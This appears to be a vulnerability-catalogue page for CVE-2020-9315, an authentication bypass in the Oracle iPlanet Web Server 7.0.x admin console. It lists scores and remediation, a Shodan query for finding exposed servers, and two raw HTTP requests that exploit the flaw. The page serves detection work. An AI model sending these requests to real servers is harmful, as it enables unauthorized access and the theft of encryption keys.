🔙 목록으로 돌아가기

CVE-2020-9315: Oracle iPlanet Web Server 7.0.x - Authentication Bypass

TitleOracle iPlanet Web Server 7.0.x - Authentication Bypass
AuthordhiyaneshDk
SeverityHigh
ImpactSuccessful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.
RemediationApply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.8793
CVE IDCVE-2020-9315
CWE IDCWE-306
Shodan Querycpe:"cpe:2.3:a:oracle:iplanet_web_server"
Tags cve cve2020 oracle auth-bypass iplanet vuln

🔍 Vulnerability Description

Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.

🌐 HTTP Request

GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-9315.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-9315.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A